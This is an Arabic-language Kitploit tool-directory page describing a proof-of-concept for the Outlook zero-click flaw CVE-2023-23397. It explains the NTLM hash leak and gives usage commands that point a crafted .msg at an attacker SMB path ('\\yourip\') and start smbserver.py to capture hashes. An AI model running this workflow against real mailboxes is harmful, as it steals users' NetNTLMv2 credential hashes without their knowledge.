Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/trackflaw/cve-2023-23397
أدوات التصيدهجمات كلمات المرورتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالأمان البريد الإلكتروني
GitHubtrackflaw/cve-2023-23397

CVE-2023-23397

PoC بسيط لثغرة CVE-2023-23397 مع الحمولة المرسلة عبر البريد الإلكتروني.

عرض المستودع
13228منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-23397

PoC بسيط وسريع لثغرة CVE-2023-23397 التي تؤثر على عميل Outlook السميك.

الوصف

يعاني Outlook من نقص في التحكم في إدخال المستخدم الذي يسمح بتكوين صوت تذكير الاجتماع والموعد. في الواقع، يتمكن المهاجم من إجبار الضحية على الاتصال بخادمه دون أي تلاعب من المستخدم (ثغرة بدون نقرة).

المهاجم الذي يستغل هذه الثغرة يسترجع ملخص NetNTLMv2 بناءً على كلمة مرور المستخدم المخدوع عبر طلب SMB. يتم تشغيل الطلب فور وصول البريد إلى صندوق الوارد.

ماذا يفعل الـ PoC؟

  1. توليد حمولة .msg.
  2. إرسالها عبر البريد الإلكتروني باستخدام خادم SMTP مخصص.

الاستخدام

في جلسة واحدة :

root@kitploit:~
python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

في جلسة ثانية (smbserver أو responder كما تريد).

root@kitploit:~
smbserver.py -smb2support SHARE .

عرض توضيحي (PoC يدوي)

poc

فيديو توضيحي (بالفرنسية)

استعادة كلمات المرور باستخدام Microsoft Outlook #CVE-2023-23397

المقال الأصلي

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

تنزيل الأداة